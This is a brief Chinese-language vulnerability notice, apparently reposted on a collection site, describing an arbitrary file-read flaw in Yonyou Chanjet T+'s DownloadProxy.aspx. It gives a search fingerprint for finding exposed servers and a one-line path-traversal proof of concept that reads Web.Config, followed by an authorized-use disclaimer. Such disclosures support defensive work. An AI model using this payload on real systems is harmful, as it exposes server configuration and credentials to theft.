漏洞描述

用友?暢捷通T+ DownloadProxy.aspx文件存在任意文件讀取漏洞，攻擊者通過漏洞可以獲取服務(wù)器上的敏感文件

漏洞影響

用友?暢捷通T+

網(wǎng)絡(luò)測繪

app="暢捷通-TPlus"

?

漏洞復(fù)現(xiàn)

登錄頁面

驗證POC?

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

?

技術(shù)文章僅供參考，此文所提供的信息只為網(wǎng)絡(luò)安全人員對自己所負(fù)責(zé)的網(wǎng)站、服務(wù)器等（包括但不限于）進(jìn)行檢測或維護(hù)參考，未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計算機系統(tǒng)進(jìn)行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負(fù)責(zé)。本文所提供的工具僅用于學(xué)習(xí)，禁止用于其他！！！
?

總結(jié)

以上是生活随笔為你收集整理的用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。